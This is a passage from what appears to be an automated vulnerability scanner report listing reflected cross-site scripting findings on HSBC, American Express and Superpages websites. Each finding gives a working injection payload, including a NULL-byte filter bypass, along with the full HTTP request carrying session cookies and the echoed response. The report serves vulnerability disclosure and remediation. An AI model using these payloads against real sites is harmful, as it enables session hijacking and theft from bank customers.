       date.setTime(date.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";


               window.location="null"
</script>
...[SNIP]...

4.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/apply

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:39 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv
...[SNIP]...
-LEFT: 20px; PADDING-TOP: 4px; font-family: Times New Roman, Arial !important; FONT-WEIGHT: bold;" class="redbox" href="https://www.us.hsbc.com/1/2/3/hsbcpremier/apply/start?custype=no&&code=MEP0002714afe63"style="x:expression(alert(1))"19a95eb25d7">
...[SNIP]...

4.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:10 GMT
Vary: User-Agent,Cookie
Content-Length: 27260
Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<a id="begin_now" href="http://www.us.hsbc.com/1/2/3/hsbcpremier/apply?code=CSM000169941ec8"style="x:expression(alert(1))"fd17a07d03f" title="Begin Now">
...[SNIP]...

4.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:11 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:11 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
ars = {
        basePath: "/1/PA_1_083Q9FJ08A002FBP5S00000000/content/usshared/Premier/Promotions/2011/Jan/",
        contactUrl: "https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM00016997758e";alert(1)//c523249deae&WT.ac=HBUS_CSM00016997758e";alert(1)//c523249deae&HiddenMandatoryFields.ProductionPromotionCode=CSM00016997758e";alert(1)//c523249deae",
           deepLinkID: "",
           xmlPath:"/1/PA_1_083Q9FJ08A002FBP5S000000
...[SNIP]...

4.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:12 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
yes,menubar=yes,resizable=yes,scrollbars=yes,toolbar=yes,width=470,height=570,screenX=0,left=0,screenY=0,top=0";
   window.open( 'https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM0001699eae3f';alert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699eae3f';alert(1)//f4fc58b391e&HiddenMandatoryFields.ProductionPromotionCode=CSM0001699eae3f';alert(1)//f4fc58b391e','_blank', features );
}
</script>
...[SNIP]...

4.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:24 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b";
   </script>
...[SNIP]...

4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109623898; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000kt9fEePAKN3zFZ84FN4F_Dj:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:29 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1";
   </script>
...[SNIP]...

4.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:11 GMT
Server: IBM_HTTP_Server
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 71876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>OPEN from Amer
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89";
   </script>
...[SNIP]...

4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742121204958; path=/; expires=Sun, 07-Feb-16 14:08:41 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zXlT7tO4dPEpQjTetmu9Wlt:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:41 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "8efe8";alert(1)//d1240e2685e=1";
   </script>
...[SNIP]...

4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742116979490; path=/; expires=Sun, 07-Feb-16 14:08:36 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000HiS-OjEOSZC4JaXS7Qm_PPe:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:36 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?.d7597"><script>alert(1)</script>c7d4c5b0106=1" />
...[SNIP]...

4.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:38 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742118555633; path=/; expires=Sun, 07-Feb-16 14:08:38 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000BLrKMWo6FW5mWWeCqsNkbyV:1115nbtvb;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:38 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<script type="text/javascript">
       var aj_queryString = "source=footer_small_business_credit_cards3cde0";alert(1)//2536ed24016";
   </script>
...[SNIP]...

4.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/business-credit-cards

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742112375272; path=/; expires=Sun, 07-Feb-16 14:08:32 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000ZIXNv3hxn7zFYSx2jAzWxLF:1115nbqmn;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:08:32 GMT
Cache-Control: no-cache="set-cookie,set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 68886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


    <head>
<
...[SNIP]...
<link rel="canonical" href="http://www201.americanexpress.com/42002?source=footer_small_business_credit_cards.d8dc2"><script>alert(1)</script>6a405ec230b" />
...[SNIP]...

4.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /getthecard/home

Issue detail

The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="htt
...[SNIP]...
<script type="text/javascript">
var sj_responseText="";
var sj_rsvpStatus="";
var sj_offerURL="";
var sj_rsvpAttempts= 0;
var sj_pageContext="Prospect";
var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb;
var sj_modalToOpen = "null";
var sj_servername = "www201.americanexpress.com";
</script>
...[SNIP]...

4.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /busprofile87daf&quot;-alert(1)-&quot;1a7bb763e07/css/busprofile.css
Server: Unspecified
Set-Cookie: JSESSIONID=B99972F11C8DCBE31C71CEA0725DF8FE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:56 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /busprofile/css/busprofile.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
